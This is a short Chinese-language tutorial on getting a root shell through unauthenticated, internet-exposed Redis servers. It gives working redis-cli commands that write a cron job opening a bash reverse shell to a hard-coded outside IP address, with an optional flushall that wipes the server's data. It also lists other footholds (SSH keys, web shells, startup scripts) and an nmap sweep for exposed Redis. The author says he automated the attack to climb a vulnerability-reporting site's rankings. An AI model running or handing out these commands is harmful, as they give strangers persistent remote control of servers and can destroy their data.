背景
Redis默认安装完成后是只能本机访问的并且没有密码。
而一般公司的应用都会需要多台服务器访问Redis,所以运维就会将/etc/redis.conf中的bind-ip改为0.0.0.0,导致外网可以匿名访问(不需要密码)。
外网可以访问导致的问题是Redis数据外泄,这时候还不能造成直接利用。
但如果Redis启动的时候是用root账户,则会造成GET SHELL。
利用方式
通过Redis的config命令,可以写入任意文件,权限足够的情况下即可写入定时任务反弹得到SHELL
# 连上一台Redis
redis-cli -h your_redis_server
# 保持写入的干净,清除原有数据(如果是其它人机器,不建议这么做)
# flushall
# 设置key(0)为bash反弹shell的脚本,每分钟执行一次,在自己服务器上监听7890端口(nc -vvl 7890)
set 0 "nn*/1 * * * * /bin/bash -i >& /dev/tcp/103.21.140.84/7890 0>&1nn"
# 设置保存的位置
config set dir /var/spool/cron/
# 设置保存的文件名
config set dbfilename root
# 保存
save
多种利用姿势
除了可以直接写定时任务拿到SHELL,还可以有多种姿势。
写cron反弹一个shell
写~/.ssh/authorized_keys,使用密钥直接登录
找到web目录的绝对路径,直接写web shell
写初始化脚本
/etc/profile.d/
主从模式利用
企业内部Redis匿名挖掘
通过nmap扫描内网网段的redis匿名访问服务。(当然可以扫描外网)
$ nmap -p6379 10.11.0/16 --script redis-info
对,就是这个洞让我wooyun排名10天前进10页,自动化利用,每天就看下报告即可。